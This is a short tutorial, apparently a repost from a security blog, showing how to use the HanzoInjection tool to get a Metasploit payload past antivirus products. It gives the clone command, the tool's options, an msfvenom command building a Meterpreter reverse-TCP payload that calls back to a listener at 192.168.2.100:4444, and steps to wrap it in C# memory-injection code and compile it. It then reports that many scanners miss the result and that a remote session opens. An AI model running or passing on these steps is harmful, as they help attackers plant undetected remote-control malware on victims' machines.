
bypassAV_hanzoInjection


Download hanzoInjection:


git clone https://github.com/P0cL4bs/hanzoInjection.git

Usage:


Usage: HanzoInjection.exe [Options] [-h] [-e] [-o] [-p] [-b]

the HanzoIjection is a tool focused on injecting arbitrary codes in memory to bypass common antivirus solutions.

Developer: Mharcos Nesster (mh4x0f)
Email:mh4root@gmail.com
Site: www.chmodsecurity.com.br

Greetx:  P0cL4bs Team { N4sss , MMXM , Chrislley, MovCode, joridos }

-------------------------------------------------------------------

Arguments Options:

       OPTION        TYPE       DESCRIPTION
       -e,--execute  [.raw]      Name of file.bin, payload metasploit type raw
       -p,--payload  [.raw]      Payload meterpreter type [RAW]  requered parameter -o [output]
       -o,--output   [file.cs]   Output generate project file.cs injection memory payload c#
       -b,--binder   [NULL]      Binder File  EXE  with encrypt file PE not requered paramenter
       -h,--help     [Help]      show this help and exit

Example Usage:

        HanzoInjection.exe -e payload_meterpreter.bin
        HanzoInjection.exe -p meterpreter.bin -o injection_memory.cs
        HanzoInjection.exe -b

 

Generate the payload:


➜  ~  msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.100 lport=4444 -f raw -o ~/Desktop/test.bin

Scan results:

[Screenshot: scan results]

Use hanzoInjection to generate the .cs file:


➜  hanzoInjection [master] wine HanzoInjection.exe -p ~/Desktop/test.bin -o ~/Desktop/test.cs

Then compile the .cs file with Visual Studio:

[Screenshot: compiling the .cs file in Visual Studio]

If an error occurs, change the compiler settings to allow unsafe code.

Scan results for the generated file:

[Screenshot: scan results for the generated file]

Some engines still flag it, but it already gets past many antivirus products. In testing, the session comes online:

[Screenshot: session online]


Do not reproduce without permission: 杂术馆 » bypassAV_hanzoInjection